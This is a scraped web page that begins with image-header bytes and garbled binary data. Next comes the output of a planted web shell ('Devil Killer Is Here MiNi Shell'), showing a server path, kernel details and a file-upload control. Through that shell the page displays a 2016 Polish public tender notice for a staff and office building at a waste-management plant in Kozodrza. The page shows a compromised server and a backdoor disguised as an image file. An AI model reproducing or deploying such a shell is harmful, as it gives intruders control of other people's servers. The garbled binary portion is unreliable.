JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160329/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160329/70418-N-2016.html

<p class="kh_header"><b>Ostrów: Rozbudowa i przebudowa Zakładu Zagospodarowania odpadów w miejscowości Kozodrza, Gmina Ostrów - budowa zaplecza socjalno-biurowego wraz z wyposażeniem oraz towarzyszącą infrastrukturą techniczną.</b><br>
<b>Numer ogłoszenia: 70418 - 2016; data zamieszczenia: 29.03.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Usług Komunalnych , Ostrów 225, 39-103 Ostrów, woj. podkarpackie, tel. 017 2235810, faks 17 2235809.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ostrow.gmina.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Rozbudowa i przebudowa Zakładu Zagospodarowania odpadów w miejscowości Kozodrza, Gmina Ostrów - budowa zaplecza socjalno-biurowego wraz z wyposażeniem oraz towarzyszącą infrastrukturą techniczną..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zakres przedmiotu zamówienia obejmuje:

1.1. Wykonanie płyt fundamentowych wraz podbudową pod zaplecze socjalno-biurowe i łącznik komunikacyjny:

a wykonanie płyty fundamentowej żelbetowej pod budynek zaplecza socjalno-biurowego wraz z podbudową o wymiarach  dostosowanych do wymiarów zewnętrznych obiektu , grubość 35 cm, klasa betonu C25 30, pręty zbrojeniowe żebrowane
stal A-IIIN
b wykonanie żelbetowej płyty fundamentowej klatki schodowej  wraz z podbudową
o wymiarach 812 cm x 300 cm i grubości 35 cm, klasa betonu C25 30, pręty zbrojeniowe żebrowane stal A-IIIN,

2. Kompleksowa budowa budynku zaplecza socjalno-biurowego wraz z wyposażeniem pomieszczeń, budowa klatki schodowej z podestem, łącznika komunikacyjnego
z konstrukcji lekkiej wraz z obudową, ciągu komunikacyjnego z kostki betonowej 
z obrzeżami chodnikowymi:

a wykonanie obiektu zaplecza socjalno-biurowego zgodnie z rysunkiem rzutu kondygnacji stanowiącym załącznik nr 7 do SIWZ  z wyłączeniem zaznaczonej na rysunku murowanej ściany oddzielenia p.poż REI 60.

Wymagania dotyczące obiektu zgodnie z załączoną dokumentacją, w konstrukcji
i z wykończeniem w standardzie nie gorszym niż: 
PODŁOGA PŁASKA
zaczynając od dołu: 
- blacha trapezowa T6, 
- wełna mineralna grubości min 100 mm, 
- płyta MFP o grubości 22 mm  w pomieszczeniach mokrych CETRIS 
- wykładzina PVC o grubości 2 mm,  w pomieszczeniach mokrych antypoślizgowa o grubości 2 mm, wywinięta na ściany na wysokość 100mmlub rozwiązanie zamienne
Własności podłogi: 
- obciążenie użytkowe 350 kg m2, 
 STROPODACH MODUŁU JEDNOSPADOWY 
warstwowy pokryty od zewnątrz: 
- membraną dachową 1,5 mm 
- płyta MFP o grubości 12 mm, 
- wełna mineralna grubości 100 mm 
- blacha ocynkowana lakierowaną w układzie kasetowym, 
 Własności stropodachu: 
- obciążenie użytkowe 150kg m2 
Odprowadzenie wody deszczowej w zewnętrznych rurach PVC. 
ŚCIANY ZEWNĘTRZNE  WEWNĘTRZNE - wykonane z płyt warstwowych blacha gładka w systemie sandwich w kolorze RAL 9010 biały
Okna: 
PVC RU, białe 6 szt. 
PVC U, białe  8 szt. 
W pomieszczeniach sanitarnych umywalnie należy zastosować szybę matową.
Drzwi:
zewnętrzne z samozamykaczem, ocieplone, metalowe, białe 1200x2100 mm - 1L
zewnętrzne z samozamykaczem, ocieplone, metalowe, białe 1200x2000 mm - 2P 
wewnętrzne, metalowe, białe 900x2000 mm - 7P + 6L
wewnętrzne, metalowe, białe 800x2000 mm - 1P + 6L

b wykonanie wewnętrznych instalacji :
Instalacje elektryczne: 
tablica rozdzielcza usytuowana wewnątrz budynku zasilana z hali sortowni odpadów dopasowana do zastosowanych urządzeń wewnątrz budynku socjalno-biurowego wraz z odpowiednimi zabezpieczeniami:
instalacja elektryczna trójfazowa wraz z gniazdami wtykowymi w ilości i z rozmieszczeniem jak na rysunkach załącznika nr 7 do SIWZ, uwzględniająca zasilenie szaf suszarniczych oraz podgrzewacza c.w.u. o poj. 400 l
oświetleniowa: oprawy oświetleniowe natynkowe dostosowane do rodzaju pomieszczenia, poziom natężenia dla poszczególnych pomieszczeń zgodny z obowiązującymi normami
podłączenia obiektu należy dokonać do przygotowanego obwodu zasilania elektrycznego przy hali sortowni

Instalacja wentylacyjna: mechaniczna i grawitacyjna zgodnie z rysunkami załącznika nr 7 do SIWZ dostosowana do obowiązujących przepisów, zapewniająca odpowiednią krotność wymian powietrza dla danego pomieszczenia.

Instalacja grzewcza: grzejniki elektryczne wyposażone w termostat i oddzielne niezależne zasilanie, dobrane do zapotrzebowania na ciepło dla konkretnego pomieszczenia.

Instalacja wodociągowa wewnętrzna: do zimnej i ciepłej wody wykonana z rur PE-X łączone poprzez wsunięcie rury i zaprasowanie lub rozwiązanie zamienne. Podłączenie do istniejącego przyłącza wodociągowego wykonanego obok obiektu.

Instalacja kanalizacyjna: wykonana z rur PVC kielichowych z uszczelką. Podłączenie zaplecza socjalno - biurowego do studzienki S2 istniejącej sieci zewnętrznej kanalizacji sanitarnej .

c) wyposażenie budynku socjalno-biurowego:
pomieszczenia sanitarne: ceramiczna armatura sanitarna  muszla toaletowa  szt.5, umywalka z baterią szt. 9, pisuar z zaworem automatycznym szt. 1, kabiny natryskowe szt. 4, szafy suszarnicze na odzież roboczą szt.2, podgrzewacz na ciepłą wodę o poj. 400l szt. zakres nie obejmuje wyposażenia obiektu w postaci mebli, urządzeń AGD.
pozostałe pomieszczenia: grzejniki elektryczne z termostatem, wentylatory mechaniczne o wydajności min 120 m3 na dobę

d) budowa łącznika komunikacyjnego:
wykonanie lekkiej konstrukcji stalowej i montaż za pomocą kotew wklejanych zgodnie z rysunkiem załącznika nr 7 do SIWZ, montaż obudowy łącznika z płyt poliwęglanu komorowego 10/3, Zestawienie stali zawiera załącznik nr 7 do SIWZ.
wykonanie i montaż klatki schodowej ze spocznikiem oraz podestu komunikacyjnego z barierkami ochronnymi z rur stalowych fi 40 w kolorze żółtym typ RAL 1003.
zabezpieczenie całości konstrukcji stalowej zgodnie z klasą odporności ogniowej przewidzianą dla tego obiektu wraz z podkładowymi farbami antykorozyjnymi w kolorze brązowym typ RAL 8014. 

Konstrukcja klatki schodowej w klasie D. Materiały okładzinowe NRO.

e budowa chodnika komunikacyjnego:
wykonanie podbudowy z kruszywa łamanego stabilizowanego mechanicznie o powierzchni 31,50 m2 o grubości min. 15 cm
wykonanie obrzeża chodnikowego o łącznej długości 29,00 mb na ławie fundamentowej z betonu C12/15. Wymiary obrzeża w mm: 60x300x1000
ułożenie kostki betonowej gr. 6 cm na podsypce cementowo - piaskowej 1:4 o powierzchni 53,00 m2.

3. Szczegółowy zakres i opis przedmiotu zamówienia zawiera dokumentacja projektowa która stanowi załącznik nr 7 do SIWZ. 
4. Obowiązki Wykonawcy i warunki wykonywania robót.
Wykonawca w ramach przedmiotu zamówienia jest zobowiązany do realizacji w szczególności następujących obowiązków oraz uwzględnienia następujących warunków lub zaleceń:
1 Realizacji przedmiotu zamówienia zgodnie z zakresem przedstawionym w dokumentacji projektowej, wiedzą techniczną, decyzjami organów administracji, zaleceniami jednostek uzgadniających, obowiązującymi normami technicznymi oraz wymogami SIWZ i Umowy;
2	Prace projektowe, roboty, dostawy i usługi muszą być wykonane zgodnie z obowiązującymi przepisami w szczególności z wymogami Prawa Budowlanego.
3	Powołanie Kierownika Budowy posiadającego niezbędne w tym zakresie uprawnienia budowlane.
4	Wykonania i utrzymania tymczasowych dróg dojazdowych;
5	Zaleca się dokonanie wizji w terenie celem sprawdzenia aktualnych warunków terenowych, w tym stanu istniejących obiektów oraz warunków związanych z wykonaniem robót będących przedmiotem zamówienia;
6	Prowadzenia dokumentacji budowy zgodnie z przepisami prawa budowlanego;
7	Zajęcia i zagospodarowania terenu związanego z potrzebami budowy, zorganizowania zaplecza budowy łącznie z zabezpieczeniem dostaw wody, energii elektrycznej oraz łączności telefonicznej na terenie budowy stosownie do potrzeb własnych  z późniejszym demontażem i uporządkowaniem terenu
8	Oznakowania terenu budowy zgodnie z wymogami i zabezpieczenia go zgodnie z przepisami BHP i ppoż. oraz pokrycia kosztów wszystkich robót i czynności związanych z wdrożeniem zaleceń z tym związanych;
9Wykonawca będzie odpowiedzialny za uszkodzenie uzbrojenia terenu i istniejących urządzeń budowlanych oraz za wszelkie następstwa zdarzeń dotyczących terenu lokalizacji budowy;
10	Zapewnienia pełnej obsługi geodezyjnej, oraz wykonania inwentaryzacji powykonawczej.
11	Ochrony instalacji na powierzchni ziemi i urządzeń podziemnych takich jak kable, rurociągi itp. oraz uzyskania od odpowiednich władz będących właścicielem tych urządzeń potwierdzenia informacji dostarczonych mu przez Zamawiającego w ramach lokalizacji wykazanych na planszy uzbrojenia. Wykonawca zapewni właściwe oznaczenie i zabezpieczenie tych instalacji i urządzeń w czasie trwania budowy;
12	Wykonanie prób eksploatacyjnych wykonanych instalacji;
13	Wykonania robót z materiałów własnych, które odpowiadają jakościowo wymogom wyrobów dopuszczonych do obrotu i stosowania w budownictwie określonym w art. 10 ustawy z 07.07.1994r. Prawo Budowlane tekst jednolity Dz. U. z 2013 r. poz. 1409 ze zmianami i wymogom przewidzianym w SIWZ;
14	Wykonania w trzech egzemplarzach budowlanej dokumentacji powykonawczej oraz wersji elektronicznej zgodnie z obowiązującymi przepisami oraz przekazania  informacji niezbędnych do wystawienia dokumentów przejęcia środków trwałych;
15	Dostarczenia instrukcji bezpieczeństwa ppoż. obiektu;
16Dostarczenia instrukcji użytkowania i eksploatacji obiektu - instrukcje obsługi wszelkich systemów i urządzeń niezbędnych do prawidłowego funkcjonowania 
i użytkowania obiektu wraz z wykazem wbudowanych urządzeń, które wymagają przeglądów serwisowych, wraz z kartami gwarancyjnym producentów ww. systemów 
i urządzeń;
17Przygotowania wszelkich dokumentów wymaganych do uzyskania protokołu odbioru końcowego robót, protokoły robót częściowych, protokoły dotyczące instalacji wodociągowej, kanalizacyjnej, elektrycznej, wentylacyjnej itp.

5. Dokumenty i zezwolenia do uzyskania przez Wykonawcę
aProjekty powykonawcze wraz z kompletem inwentaryzacji geodezyjnych powykonawczych;
b Kompletna dokumentacja robót budowlanych oraz protokół odbioru końcowego..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 10.06.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Złożona oferta musi być zabezpieczona wadium w wysokości 7 500,00 PLN (słownie: siedem tysięcy pięćset złotych 00/100).
1.	Wadium może być wniesione w jednej lub kilku z następujących form:
a)	pieniądzu,
b)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym.
c)	gwarancjach bankowych,
d)	gwarancjach ubezpieczeniowych,
e)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dn. 9.11.2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007r. nr 42, poz.275  z późn. zm.). 
2.	Wadium w formie pieniężnej winno być wpłacone na konto Zakładu Usług Komunalnych w Ostrowie w BS Ropczyce Nr 66 9171 0004 0009 7550 2000 0020, przed upływem terminu składania ofert. 
Za skuteczne wniesienie wadium w pieniądzu Zamawiający będzie uważał wadium, które 
w oznaczonym terminie znajdzie się na jego koncie. Oryginał lub kopię przelewu należy załączyć do oferty.
3.	Wniesienie wadium w pozostałych formach, określonych w pkt.1 wymaga przedłożenia pisma (oryginału) będącego poręczeniem / gwarancją banku, towarzystwa ubezpieczeniowego lub organizacji obowiązującym przez okres związania ofertą, na odpowiednią kwotę 7 500,00 zł zawierającego informację, że udzielona gwarancja / poręczenie stanowi zabezpieczenie na wadium, na rzecz Zakładu Usług Komunalnych 
w Ostrowie, 39-103 Ostrów 225 dotyczące przetargu na dostawę oleju napędowego oraz zobowiązanie banku, towarzystwa ubezpieczeniowego lub organizacji, wypłaty wadium w okolicznościach określonych w art. 46 ustawy Prawo zamówień publicznych. Gwarancja bankowa winna być zgodna z wymaganiami określonymi przez prawo bankowe.
4.	Dokumenty potwierdzające wniesienie wadium w formie opisanej w pkt 3 Wykonawca zobowiązany jest w oryginale dostarczyć do sekretariatu Zakładu, gdzie otrzyma potwierdzenie złożenia tego dokumentu, a potwierdzoną kopię należy dołączyć do oferty.
5.	Zwrot i zatrzymanie wadium następuje na warunkach określonych w art. 46 ustawy Prawo zamówień publicznych.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony jeżeli Wykonawca  złoży oświadczenie 
w trybie art.22 ust.1 (zał. nr 2 do SIWZ)</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony jeżeli Wykonawca  złoży oświadczenie 
w trybie art.22 ust.1 (zał. nr 2 do SIWZ)</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony jeżeli Wykonawca  złoży oświadczenie 
w trybie art.22 ust.1 (zał. nr 2 do SIWZ)</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony jeżeli Wykonawca  złoży oświadczenie 
w trybie art.22 ust.1 (zał. nr 2 do SIWZ)</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony jeżeli Wykonawca  złoży oświadczenie 
w trybie art.22 ust.1 (zał. nr 2 do SIWZ)</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - Gwarancja - 10</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>2.	Zamawiający dopuszcza możliwość zmian postanowień zawartej umowy w stosunku do
treści oferty w następującym zakresie:
1) zmiany przepisów prawnych dotyczących przedmiotu umowy, jeżeli zmiana przepisów wymaga zmiany postanowień umowy, 
2) w sytuacjach niezależnych od stron umowy, w przypadku wystąpienia istotnych okoliczności, których nie można było wcześniej przewidzieć, a które przemawiają za koniecznością zmiany postanowień umowy. 
Wszelkie zmiany umowy mogą być dokonywane na podstawie obustronnie uzgodnionych aneksów do umowy. Podpisanie aneksu do umowy powinno być poprzedzone, pod rygorem nieważności, sporządzeniem protokołu konieczności zawierającego uzasadnienie.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.ostrow.gmina.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zakład Usług Komunalnych w Ostrowie, 39-103 Ostrów 225.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 13.04.2016 godzina 09:00, miejsce: w siedzibie Zakładu Usług Komunalnych w Ostrowie /budynek Urzędu Gminy w Ostrowie/.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com